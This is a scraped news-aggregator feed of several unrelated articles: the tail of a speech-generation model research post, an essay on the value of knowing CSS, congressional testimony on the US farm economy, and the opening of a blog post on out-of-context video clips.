    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

    Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 31 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43227881 Sun, 02 Mar 2025 06:13:01 GMT
    <![CDATA[Knowing CSS is mastery to front end development]]> thread link) | @tipiirai
    March 1, 2025 | https://helloanselm.com/writings/knowing-css-is-mastery-to-frontend-development | archive.org

    There are countless articles why developers should not focus on Frameworks too much and instead learn to understand the underlying languages. But I think rarely we can find good reasons except that Frameworks come and go. To me, the main reason is different: You won’t be a master at frontend development if you don’t understand underlying mechanisms of a language.

    A usual stack today is React together with countless layers in between the language and the framework itself. CSS as styling method is not used natively but via JavaScript tools that translate it into native CSS. For JavaScript we nowadays write an opinionated Framework language mix using TypeScript which by itself is translated to native JavaScript in the end again. And while we all know the comfort of these tools and languages, there are many things that make it easier if you understand a browser’s ecosystem:

    • Debug JavaScript errors easier and also in foreign environments without a debugging browser extension installed
    • Debug CSS
    • Write custom CSS (and every project I’ve seen so far needs it somewhere)
    • Understand why errors occur that you may not find locally and only in client’s browsers

    In the past years I had various situations where TypeScript developers (they called themselves) approached me and asked whether I could help them out with CSS. I expected to solve a complex problem but for me — knowing CSS very well — it was always a simple, straightforward solution or code snippet:

    • A multi-colored footer bar should not be an image, it’s a simple CSS background multi-step gradient with one line of code. No need to scale an image, create an SVG, just CSS.
    • Custom icons for an input field? Welp, it’s not that easy for privacy reasons to add a pseudo-class here in certain cases. But there are many simple solutions and no need to include another bloated npm dependency that nobody understands what it does.
    • Webfonts: Dev: We can’t add another webfont style, we already serve 4MB of webfonts.
      → Me: Alright, why don’t we serve it as Variable Font?
      → Dev: Oh, what’s this?
      → Check it out, we now load 218kb async, only one file and have all our styles we have and will ever need inside.

    Nowadays people can write great React and TypeScript code. Most of the time a component library like MUI, Tailwind and others are used for styling. However, nearly no one is able to judge whether the CSS in the codebase is good or far from optimal. It is magically applied by our toolchain into the HTML and we struggle to understand why the website is getting slower and slower.

    Most of the performance basics I learned ten years ago are still the most relevant ones today. Yet, most developers don’t know about them because we use create-react-web-app or similar things. Put Cloudflare on top to boost performance and reduce costs. Yes, that works for your website and little project.

    What companies expect when they ask for a web dashboard serving real time data for their customers is different: It should be a robust, well working application that is easy to maintain. That means we need to combine the developer experience (React, TypeScript, all the little helpers) with the knowledge of how browsers and networks work. And only then we can boost performance, write accessible code, load dynamic data in a proper and safe way and provide fallbacks in case something goes wrong.

    In cases of emergency like an Incident with the service, I’ve seen the difference often enough between people who exactly know where to look at, start debugging and go further, and those who try to find out in panic what’s going on here, hoping that a restart or re-deployment with reinstalled dependencies will help bring the service back to life.

    And that means in the end again: If you know CSS, you also know the style framework. If you understand JavaScript, TypeScript is not a big problem for you. And that makes you a Senior or Principal.

    ]]>
    https://helloanselm.com/writings/knowing-css-is-mastery-to-frontend-development hacker-news-small-sites-43227303 Sun, 02 Mar 2025 04:32:06 GMT
    <![CDATA[Examining the Economic Crisis in Farm Country]]> thread link) | @toomuchtodo
    March 1, 2025 | https://www.terrainag.com/insights/examining-the-economic-crisis-in-farm-country/ | archive.org

    Chairman Thompson, Ranking Member Craig, and Members of the Committee, thank you for inviting me to testify before you today.

    My name is John Newton, and I am the Executive Head of Terrain. I am honored to appear before the Committee to provide insights on factors contributing to the health of the U.S. farm economy. Terrain is tasked with researching agriculture, food, risk management and macroeconomic areas for our partnering Farm Credit associations, which are AgCountry Farm Credit Services, American AgCredit, Farm Credit Services of America, and Frontier Farm Credit. The service areas of these Farm Credit associations span from Iowa, North Dakota and Wisconsin to New Mexico, California and Hawaii, with many states between.

    I hold a Ph.D. in agricultural and applied economics from The Ohio State University and have over two decades of experience in economic and policy analysis and development. I recently served as Chief Economist on the U.S. Senate Committee on Agriculture, Nutrition, and Forestry for Senator Boozman of Arkansas. Before that, I was the Chief Economist for the American Farm Bureau Federation, an organization representing nearly 6 million family and farm members on Capitol Hill.

    Thankfully, due to the foresight of leaders of this Committee, as well as your colleagues in the Senate, the ad hoc assistance provided in the American Relief Act of 2025 will bring much-needed relief to farmers who have experienced multiple years of declining revenues and farm income, as well as those who have faced catastrophic natural disasters on their farm. However, since the high-income environment of 2022, we have seen a tale of two farm economies: Crop producers have experienced significant challenges due to low prices and high inputs, while some livestock producers have benefited from high cattle and milk prices, helping to offset elevated input costs.

    For example, since 2022, inflation-adjusted net cash farm income for corn and soybean farmers has dropped by 45% to its lowest levels in a decade and a half. Meanwhile record cattle prices have contributed to higher levels of income since 2022, providing an opportunity for those farmers and ranchers to finally rebuild their balance sheets from the pandemic-era lows.

    Chart - A Tale of Two Farm Economies

    Farm Economic Conditions

    The flagship measurement of the overall health of the U.S. farm economy is the USDA’s net farm income, which measures the difference between total gross farm income and total production expenses and is a broad measure of the financial conditions across the U.S. farm sector.1

    Driven by record agricultural export sales, increased domestic demand, and pandemic-related federal support, inflation-adjusted net farm income reached a record high in 2022 at $198 billion. The rise in farm income, however, coincided with historic inflation as post-pandemic supply chain disruptions and reduced labor availability drove up costs across all sectors of the U.S. economy. For food- and energy-related products, Russia’s invasion of Ukraine further reduced global stockpiles of critical grains and oilseeds; disrupted global trade flows; and drove food, energy and fertilizer prices to record highs.

    Nominal farm production expenses reached a record of $462 billion in 2022 and remain near those historically high levels as input costs have not eased for farm families across the country. For example, crop production costs are projected to be higher this year for seed, chemicals, custom work, repairs, maintenance and taxes, while lower costs are projected for fertilizers, energy and interest.

    With input costs slow to decline, pressure has been mounting for three consecutive years across the farm economy — specifically for crop and specialty crop farmers. Many farmers have worked through their working capital and are now faced with tough decisions on how to reduce expenses without giving up hard-earned access to land or compromising productivity. The reality on the ground is that between 2022 and 2025, and driven by lower crop prices and elevated input costs, the USDA’s Farm Sector Income Forecast shows that:

    • Since 2022, and excluding government payments to agriculture, U.S. inflation-adjusted net farm income has fallen by $43 billion or 26%. U.S. net farm income (excluding government support) is projected at $138 billion in 2025, up slightly from 2024 when adjusted for inflation.
    • When including the ad hoc federal support provided by members of this Committee and your colleagues in the Senate during the last Congress, alongside traditional government support from commodity and conservation programs, U.S. inflation-adjusted net farm income is projected at $180 billion, up 26% from last year.
    Chart - Ad Hoc Aid to Lift Farm Economy in 2025

    The USDA’s Farm Sector Income Forecast shows that U.S. crop farmers have experienced three consecutive years of declining cash receipts, falling from an inflation-adjusted value of $307 billion in 2022 to $240 billion in 2025 — a decline of $67 billion, or 22%. For many farmers — and depending on their management, marketing, land ownership and risk management decisions — margins may have been tight, or returns may have been below breakeven, for several years because of inflation in farm production expenses and lower farm-gate prices.

    Inflation-adjusted cash receipts for livestock have fallen $7 billion since 2022 and those producers continue to face new challenges. Input costs remain elevated, and goals to capitalize on higher cattle or milk prices face headwinds due to issues with drought conditions, low inventory levels, and rising animal disease risks. Despite these challenges, for some, cash receipts for livestock, dairy, and poultry farmers have remained stable, preventing a much wider economic crisis in farm country.

    Crop Farm Prices, Input Costs and Margins for 2025

    Last year, the USDA provided an early release of supply, demand and price projections to 2034 for select commodities.2 Terrain analysis of the data revealed that for the upcoming 2025/26 crop year (that is, the crop that farmers will plant this spring), the national marketing year average corn price is projected at $3.90/bushel (bu.), down 40% from the recent high of $6.54/bu. Soybean prices are projected at $10/bu., down 30% from two years ago. All major crops except wheat are expected to see lower or flat prices for the upcoming crop year. This upcoming crop year, wheat prices are projected to climb to $5.80/bu., yet wheat prices will remain 34% lower than the price farmers received just a few short years ago.3

    As I have indicated, input costs have been slow to adjust, and this spring the cost of production for major field crops is expected to remain elevated.4 Crop input costs this year are expected to be the highest for rice at more than $1,300/acre (ac.). Next come peanuts, then cotton. For cotton, the cost of production is forecast at $900/ac. The cost to produce an acre of corn is projected at $871/ac., and for soybeans the projected cost of production is $625/ac. To put these costs into perspective, according to the USDA Census of Agriculture, the average-sized corn farm in the U.S. is 279 acres, which equates to nearly $250,000 in total costs to plant a crop, with no guarantee that Mother Nature will do her part.5

    Given these high input costs and expectations for crop prices to mostly move lower again in 2025, it is no surprise that another year of margins at or below breakeven is on the horizon. Even the University of Illinois’ 2025 Crop Budgets confirm crop prices and revenues will be below breakeven for high-productivity farmland in Central Illinois.6 The most recent crop market outlook from the Agricultural and Food Policy Center at Texas A&M University reveals that many farms in each of their four commodity types (feed grains, cotton, rice and wheat) are not expected to have a positive cash flow over the next five years and there is no crop rotation that yields a positive return.7

    Based on Terrain's analysis of current price and yield expectations, for the 2025/26 marketing year, the revenue shortfall is expected to be the largest for cotton at $339, or 38% below breakeven. Other crops such as grain sorghum are projected at $174, or 40% below breakeven, and corn at $161, or 19% below breakeven. Importantly, for every major U.S. field crop, the projected revenue in 2025 is below the projected cost of production, marking the third year in a row of low or negative economic returns, on average, for crop farm families.

    Chart - Margins Expected to Remain Tight in 2025

    The Impact of Bridge Economic Assistance for Farmers

    In response to this historic and ongoing decline in the farm economy, and through the foresight of leaders of this Committee, the American Relief Act of 2025 provided the USDA with nearly $10 billion to deliver ad hoc financial assistance to crop farmers experiencing economic disasters as well as more than $20 billion to help farmers recover from catastrophic natural disasters such as hurricanes, wildfires and drought.8 According to the American Farm Bureau Federation, in recent years, catastrophic natural disasters have resulted in agriculture-related losses in the tens of billions of dollars.9

    Terrain's analysis indicates that for major crops such as corn, soybeans, wheat, sorghum, oats and cotton, the estimated economic assistance payments (excluding payments related to natural disasters) offset only a portion of a crop farm's negative margin.10 Terrain’s estimates further indicate that these economic assistance payments could range from a high of $87/ac. for cotton to a low of $29/ac. for soybeans, and nationally will average approximately $38/ac. Unfortunately, in no case do these program payments bring farm cash flow levels even close to breakeven.

    U.S. Map - What Will Farmers in Each State Receive?

    These economic assistance payments are only a bridge until a new five-year farm bill can be authorized by Congress. These dollars are much needed as farmers prepare for the upcoming growing season. However, while these one-time payments will help to improve working capital, based on crop price and yield projections from the January 2025 World Agricultural Supply and Demand Estimates, many farmers are still projected to experience tight or negative margins after accounting for the economic assistance payments, amplifying the need for a new five-year farm bill with enhanced risk management tools.11

    Chart - Tight Margins and American Relief Act Payments

    Agricultural Trade and the Farm Economy

    In the years preceding the high-farm-income environment, several new trade agreements were negotiated and agreed upon with countries around the world that impacted the economic success of U.S. agriculture. These included the Economic and Trade Agreement Between the United States of America and the People’s Republic of China, the United States-Mexico-Canada Agreement, and the U.S.-Japan Trade Agreement.12,13,14

    By fiscal year (FY) 2022, the value of U.S. agricultural exports had reached a record high of $196 billion and contributed to the financial success of many farm families across the country.15 While food and agricultural imports were also on the rise, the U.S.’s agricultural industry remained mostly in a position of positively contributing to the U.S. trade balance with the rest of the world — a position that U.S. agriculture until only recently had held for the better part of five decades.

    Now, in FY25, the U.S. agricultural trade deficit is projected to be the largest in history at nearly $46 billion, according to the USDA’s Economic Research Service. While the value of the dollar, demand for year-round access to fruits and vegetables, and demand for imported alcoholic beverages contribute to record food and agricultural imports, the value of U.S. exports has fallen sharply — projected at $170 billion in FY25 and down $26 billion from FY22’s record.16

    Chart - U.S. Agricultural Trade and Trade Balance

    The ripple effect of slower U.S. agricultural exports hits the farm economy, farm families and rural Main Street, and is a large contributor to the decline in crop cash receipts and overall net farm income since 2022.

    To reverse the record-large trade deficit in agriculture, a priority should be placed on finding and developing new markets for U.S. agriculture, reducing non-tariff barriers to trade, accelerating the adoption of science-based production practices, and improving existing market access in the major economies with which U.S. agriculture does business and those we desire to do business with.

    To assist in export market access and development, the USDA allocated $174 million through the Market Access Program (MAP) and allocated $27 million through the Foreign Market Develop Program (FMD) to collaborating organizations in FY24, but more can be done. The Farm, Food, and National Security Act of 2024, passed out of Committee in the 118th Congress, would have doubled funding to MAP/FMD — providing increased opportunities for farmers, ranchers and their collaborating organizations to close the gap in our agricultural trade deficit in the years to come.17

    Under the current administration, tariffs are either in effect or under consideration in major U.S. agricultural export markets. Although none of these markets has enacted retaliatory measures directly affecting U.S. agriculture or farmers and ranchers, it is crucial to closely monitor economic implications of these tariffs on farm-level income, supply chains, and the consumption of food and agricultural products. This evaluation will be essential if Congress ultimately needs to contemplate market interventions or ad hoc support measures to protect farmers and their rural communities from retaliation.

    Enhanced Risk Management Is Critical in Farm Country

    Farm Credit has been a partner with the USDA for decades in the delivery of federal crop insurance to our nation’s farmers and ranchers. Since 2014, the USDA’s Risk Management Agency has worked with the industry to make over 300 crop insurance modifications, including the introduction of new policies through the 508(h)-development process to manage new risks. Notable developments include:

    • New policies to manage the risk of rising input costs on farm margins
    • New area-based plans of insurance with higher levels of coverage
    • Expanded options for livestock producers such as Dairy Revenue Protection (Dairy-RP)
    • Higher premium cost-sharing for cattle and hog farmers

    Through various modifications and enhancements, Farm Credit aims to provide the necessary tools and insights, including those offered by Terrain, to assist farmers in managing the risk associated with price declines or crop losses through crop insurance. Several Farm Credit associations have invested in new technologies to help crop and livestock farmers make informed crop insurance decisions. For example, Optimum uses a simulation process that combines prices, yields, and federal crop insurance policy frameworks to determine how different combinations of crop insurance products can perform in helping farmers manage their risk. Through Optimum, farmers can better take advantage of market opportunities before the growing season to maximize revenue and reduce risk, providing them the financial security to better market their crop during the growing season.

    Even with all the opportunities and tools the federal crop insurance program and Farm Credit provide, my research suggests that the most common crop insurance policies for managing risk will not cover breakeven expenses for most crop farmers in 2025. For example, using county-level non-irrigated yield information from the USDA’s Risk Management Agency, Chicago Mercantile Exchange settlement price for new-crop corn of $4.60/bu., and the most common crop insurance policy purchased in each county, crop insurance guarantees cover 70% of USDA Economic Research Service production costs in just over 60% of corn-producing counties. In about one-fourth of these counties, insurance guarantees cover only 50% of the USDA's estimated production costs.

    Endorsements like the Enhanced Coverage Option, created at the direct request of growers, enable farmers to buy higher coverage levels. The USDA's recent premium cost-share improvements make it a viable risk management option. However, in 2024, slightly more than 15 million acres were insured across 30 crops. Increasing education and awareness of these endorsements and changes to these endorsements — alongside other improvements in policy options such as Agriculture Risk Coverage (ARC) or Price Loss Coverage (PLC) — will help farmers collaborate with their insurance agents and other stakeholders to create effective risk management strategies for their farm operation.

    U.S. Map - Insurance Coverage May Fall Short of Input Costs

    State of the Dairy Industry

    Dairy is one of the largest portfolios financed by our partner Farm Credit associations, prompting us to closely monitor the health of the dairy economy. The number of dairy farms in the U.S. has declined significantly. According to the most recent Agricultural Censuses, farm numbers decreased from 39,303 in 2017 to 24,082 in 2022.18 Although the total number of milk cows also fell, it was a less pronounced decline, from 9.5 million to 9.3 million head, underscoring the rapid consolidation within the industry.

    Dairy profitability has been highly uncertain due to the volatility of managing milk and feed prices alongside rising input costs beyond feed. Dairy Margin Coverage (DMC) margins, which serve as an overall indicator of U.S. dairy farm profitability, have fluctuated dramatically, ranging from an all-time low of $3.52/hundredweight (cwt) to an all-time high of $15.57/cwt within 15 months from July 2023 to September 2024.19

    In addition to market-driven volatility, U.S. dairy producers faced an outbreak of Highly Pathogenic Avian Influenza (HPAI) in 2023 that has persisted into 2025. Affected milking herds can experience a significant reduction in milk production, ranging from 20% to 30% during the primary month of infection, with minor reductions continuing in the following months. Since March 2023, there have been 937 confirmed cases in 16 states. Notably, California — the top milk-producing state in the country — has reported 720 cases and experienced state-level milk production declines in both November and December 2024, resulting in a shortfall of hundreds of million pounds of milk.

    The impact of animal diseases, geopolitical risks, and fluctuations in supply and demand ultimately affect the mailbox milk price checks that dairy farmers receive. With slightly more than a quarter of the U.S. milk supply purchasing livestock insurance, there is an ongoing need for increased education and awareness regarding the availability and affordability of risk management tools such as Dairy-RP and Livestock Gross Margin insurance.

    State of the Beef Cattle Industry

    Alongside dairy and row crop portfolios, financing for beef cattle production makes up another large share of the portfolio of our partnering Farm Credit associations. There are various segments of the beef cattle industry that we monitor closely, including cow-calf producers, stocker/backgrounder operations, feed yards and processing.

    Drought conditions, the early pandemic-era financial pressures felt across many segments of the beef cattle supply chain, and the ongoing decline in the cattle numbers have contributed to a substantial decline in the number of farms with beef cows. Over the last five years alone, feeder and fed cattle prices have rallied from cycle lows to record highs. Simultaneously, beef cow and feeder cattle and calf inventories have continued to decline to more than 60-year lows. As reported in the USDA’s recent cattle inventory report, beef cow numbers, as of January 1, 2025, total 27.9 million head. This is down 0.5%, or 150,000 head, versus a year earlier. Compared with the most recent cycle peak that occurred in 2019, beef cow inventories are down 3.8 million head, which represents a decline of 12%. The report also revealed that cow-calf operations retained and bred 2% fewer beef replacement heifers during 2024 and retained about 1% fewer heifer calves to grow and breed during 2025. This will make it extremely difficult for any herd rebuilding to occur before 2027.20

    Even though most beef cow-calf operations have returned to profitability during this contraction phase of the cattle cycle, escalating costs have kept record prices from returning record profits. According to the USDA’s Economic Research Service Estimated Costs and Returns for Cow-Calf Producers, the total cost of production reached a record high of $1,729/head in 2024, while the average returns over variable operating costs are approximately half of what returns were a decade ago when cattle prices reached similar levels.21

    Emerging forecasts for a return to drought conditions across much of the major cow-calf production areas, high operating costs, higher interest rates due to inflation, and advancing average producer age are holding most cow-calf producers back from thinking of breeding herd expansion. Many operations are using the opportunity of high prices and relatively higher revenues to deleverage their financial position and improve balance sheets. A return to profitability and a positive outlook for continued high calf prices has most cattle producers evaluating the multiple factors that could make or break their successful herd rebuilding.22 The reduction in beef cow and beef replacement heifer numbers that occurred during 2024 and was confirmed in the cattle inventory report suggests the beef cow herd may only stabilize during 2025 and 2026. The current rally in prices for all classes of cattle and beef has been driven by a simultaneous decline in cattle numbers and continued year-over-year increases in beef demand. Cattle and beef producers’ focus on consumer tastes and preferences and delivering a consistent improvement in beef quality has been a winning strategy.

    Current cattle price cycle lows for feeder and fed cattle occurred in April 2020, during the onset of the COVID-19 pandemic. Now, less than five years later, feeder and fed cattle prices are setting record highs. Since setting their lows, feeder cattle prices are up 142% ($117/cwt to $277/cwt) and fed cattle prices have rallied 121% ($95/cwt to $210/cwt).

    Improved grazing opportunities and declining feed grain prices resulted in modest profitability for the margin-driven stocker and feed yard cattle operations that grow cattle they have purchased from other cattle producer segments. However, the record-high prices they paid for replacement cattle during the fall and winter of 2024 — when the number of available cattle was historically low — may yield financial losses during the second half of 2025 when they sell those animals.

    The record value of the inventory on cattle operations has underscored the continued and growing need for functional and efficient risk management tools for all sizes of operations. Producers’ access to tools like Livestock Risk Protection (LRP) and Livestock Gross Margin (LGM) plans is increasingly important, as they serve backgrounding and feed yard operations well. Recent enhancements to the programs will make them even better tools for farmers and ranchers. Some cow-calf operations are participating in LRP but have additional exposure to weather, driving poor ranch-level reproductions and reducing calf growth. The Weaned Calf Risk Protection pilot program could be a valuable tool for ranchers and farmers, but ongoing education on program functionality is needed to enhance program adoption.

    Specialty Crop and Wine Grape Challenges in California

    Specialty crop production in California has faced significant challenges since the onset of the COVID-19 pandemic. While some crops have fared better than others, most have experienced either a rapid increase in costs, a sharp decrease in prices, or both. These developments have compounded existing challenges in the state's agriculture sector, such as rising regulatory compliance costs and the Sustainable Groundwater Management Act (SGMA), which restricts groundwater pumping and leads to the repurposing of many acres of production.

    Tree nuts, a major portfolio of our partner Farm Credit associations, have been hit particularly hard. The pandemic disrupted global shipping lanes, causing inventories of almonds and walnuts to accumulate in warehouses, which put immediate downward pressure on prices. Combined with increased costs due to inflation, this resulted in the lowest profitability on record, according to Terrain research.23 This has forced many farmers to remove acreage, with bearing walnut acreage already in decline for the first time since 1999, according to the USDA. Almond bearing acreage is also expected to decline soon.

    Weather challenges and economic headwinds contributed to a smaller wine grape crop in 2024.24 U.S. wine grape growers continue to face growing risk of financial loss due to the increasing prevalence of wildfires in key West Coast growing regions. Growers suffered substantial losses in both 2017 and 2020 due to vine damage as well as the rejection of contracted fruit stemming from actual and perceived smoke taint. Many estate wineries used only a portion of their fruit or did not make wine at all, and some smoke-impacted grapes were made into bulk wine and sold at below-market prices. The estimated financial loss to California wine grape growers was over $600 million in 2020 alone. Reflecting the severe losses that occurred in the California grape industry in 2020, more than $300 million in indemnities were made to California grape growers, a record high and a clear reason why recent developments such as Fire Insurance Protection – Smoke Index is much needed for grape growers subject to fire risks.25

    Farm Bill Is a Five-Year Contract with Agriculture

    The Congressional Budget Office’s January 2025 baseline for mandatory farm and nutrition programs projected total farm bill spending at $1.4 trillion over 10 years.26 Of that total, approximately $300 billion is projected for mandatory USDA farm programs such as crop insurance, commodity income support programs, livestock disaster programs, conservation and working lands programs, and trade promotion programs. These critical programs are currently operating on a one-year extension through the end of FY25, with no certainty thereafter.27

    Pie Chart - January 2025 Baseline for Farm Bill Programs

    Many of the linchpin farm bill programs that farmers depend upon need modernization. Since the last five-year farm bill reauthorization in 2018, the farm bill baseline has increased by $556 billion, or 64%, with only 17% of that total driven by farm-related programs. Simultaneously, U.S. agriculture has faced down unprecedented economic challenges associated with increased catastrophic natural disasters, disruptions related to COVID-19, and increased price volatility due to geopolitical risks — challenges that traditional farm bill programs were ill-equipped to face.

    As a result, Congress has intervened on several occasions to provide ad hoc support, most recently with the American Relief Act of 2025. Since 2018, I estimate that ad hoc support to farmers and ranchers has totaled more than $132 billion, compared with slightly more than $20 billion from direct income support programs such as ARC, PLC or DMC. Ad hoc support has been more than six times higher than the support from farm bill commodity support programs. While ARC and PLC are expected to deliver higher levels of support for the 2025/26 crop year, this is temporary, as support levels will gradually decline each crop year in a low-price environment.28 For other crops like rice or peanuts, their farm bill support has not materially changed in over a decade.

    The farm bill is a five-year contract with agriculture and rural America, and it is time to update that contract with our farmers and ranchers, given the significant federal support coming from outside the farm bill. With nearly 350 million people in the U.S. (hopefully consuming three meals per day), the cost of critical farm risk management and conservation programs is less than 8 cents per meal. Ask anyone in America if they would pay 8 cents per meal to ensure a safe, abundant, sustainable and affordable food supply. The answer will be a resounding yes.

    Farm Credit is there for the farmer through the highs and the lows of the farm economy; we know firsthand that the sense of urgency is real in farm country and the opportunity to enhance the five-year contract with agriculture and rural America is now, before it is too late.

    I have spent my entire career working with farm families and deeply understand the challenges and potential opportunities that lie ahead. Actions by the Agriculture Committees and administration play a key role in the success of U.S. agriculture, our food security and our national security. Healing an ailing farm economy with a new five-year farm bill would be an important first step.

    Thank you very much for the opportunity to offer testimony before you today. I am thankful to every member of this Committee for your time and attention, and I look forward to answering any questions you may have.

    Endnotes

    27The USDA’s Federal Crop Insurance Program operates on permanent authority.

    ]]>
    https://www.terrainag.com/insights/examining-the-economic-crisis-in-farm-country/ hacker-news-small-sites-43227226 Sun, 02 Mar 2025 04:19:05 GMT
    <![CDATA[The Clip]]> thread link) | @paulorlando
    March 1, 2025 | https://unintendedconsequenc.es/the-clip/ | archive.org

    How much context is the right amount of context? When we necessarily choose a section — a clip — of a story on which to focus, how do we know we have chosen well?

    How far out do we need to zoom? Further to that, what problems are caused by our choice of the clip?

    There are differences in level of zoom. When Dan Carlin of Hardcore History first does a five hour podcast on Rome as a prelude to eventually get to talk about Cleopatra, that’s an uncommon wide angle view, though it still summaries years into hours. When we look at a short shareable video or an image as a way to sum up an event, that’s a view constrained by attention. There’s a time for each type of view, but media business models often prefer the quick, upsetting, and shareable.

    When it came to using a clip and interpreting intent, Cardinal Richelieu put it famously.

    “If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.”

    Whenever I read a quote that good I wonder if it was said at all. So I dug into it a bit — something I hadn’t done before, though I first heard that quote years ago. After all, that Richelieu quote is a clip itself. The quote, as it turns out, is first listed in The Cyclopedia of Practical Quotations, by Hoyt, Jehiel Keeler (p 762).

    Those six lines mentioned, what are they? They are a snippet of one person’s thoughts that they chose to express. Edited and reinterpreted, they can mean something other than desired. A clip can represent many things and be different to an enemy than a friend.

    Publication date of the source of Richelieu’s quote: 1896. That’s over 250 years after Richelieu died.

    I went from being a news junkie years ago to avoiding the news today. So I’m not that familiar with Candace Owens or Ted Lieu. I know their names but couldn’t tell you the details of what they stand for.

    That’s why I was surprised when my Twitter feed was inundated one day in April with clips of their Congressional hearing exchange. Something had happened that, while maybe not newsworthy, was at least share-worthy. Again, it just seemed like it was too perfect of an exchange. After a few days, I dug in.

    ted lieu nails gop for inviting hitler apologist candace owens to hearing on white supremacists pic.twitter.com/UPiGcSRPUQ

    — Oliver Willis (@owillis) April 9, 2019

    Candace Owens: “I think it’s pretty apparent that Mr. Lieu believes that black people are stupid and will not pursue the full clip…That was unbelievably dishonest…I’m deeply offended by the insinuation of revealing that clip without the question that was asked of me.” pic.twitter.com/UioMSZK93d

    — CSPAN (@cspan) April 9, 2019

    So which is it? Which clip do I accept? And how is it possible that there was a chosen clip on social media at all? Both of those clips are only a few minutes long combined. Why did they not appear together?

    That was something that only made sense after I checked on the hearing.

    This is the full video. It is four hours long. How many people will watch it in its entirety, rather than the clip that best represents what they want to be true?

    Those clips are interspersed within the four hour hearing. How many people have time to select among those four hours? So you could say the lesson of Owens – Lieu is different from that of Richelieu. Richelieu takes any clip and makes it mean anything incriminating. Owens – Lieu takes a selected clip because without context it sounds like something incriminating.

    Some People

